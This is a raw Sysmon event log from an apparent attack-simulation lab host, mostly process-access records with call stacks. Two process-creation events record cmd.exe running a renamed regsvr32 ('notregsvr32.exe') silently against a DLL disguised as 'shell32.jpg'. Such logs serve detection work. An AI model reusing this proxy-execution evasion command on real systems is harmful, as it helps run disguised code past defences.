Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362068Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362067Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362066Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362065Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362064Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000362063Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-337b-6013-8402-000000001100}165610428C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14387|C:\Windows\System32\CapabilityAccessManagerClient.dll+15172|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362062Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-337b-6013-8402-000000001100}16563520C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362061Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362060Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362059Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362058Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362057Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362056Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-bb03-000000001100}5928C:\Temp\notregsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362055Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-3708-6013-ba03-000000001100}73606952C:\Windows\system32\cmd.exe{8e433fbf-3708-6013-bb03-000000001100}5928C:\Temp\notregsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362054Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.559{8e433fbf-3708-6013-bb03-000000001100}5928C:\Temp\notregsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Temp\notregsvr32.exe /s C:\Users\ADMINI~1\AppData\Local\Temp\shell32.jpg C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F{8e433fbf-3708-6013-ba03-000000001100}7360C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Temp\notregsvr32.exe /s %temp%\shell32.jpg" 10341000x8000000000000000362053Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.554{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362052Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-3708-6013-ba03-000000001100}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362051Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3708-6013-ba03-000000001100}7360C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000362050Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362049Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362048Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362047Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362046Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362045Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000362044Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-ba03-000000001100}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362043Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.538{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3708-6013-ba03-000000001100}7360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000362042Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.543{8e433fbf-3708-6013-ba03-000000001100}7360C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Temp\notregsvr32.exe /s %%temp%%\shell32.jpg" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000362041Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 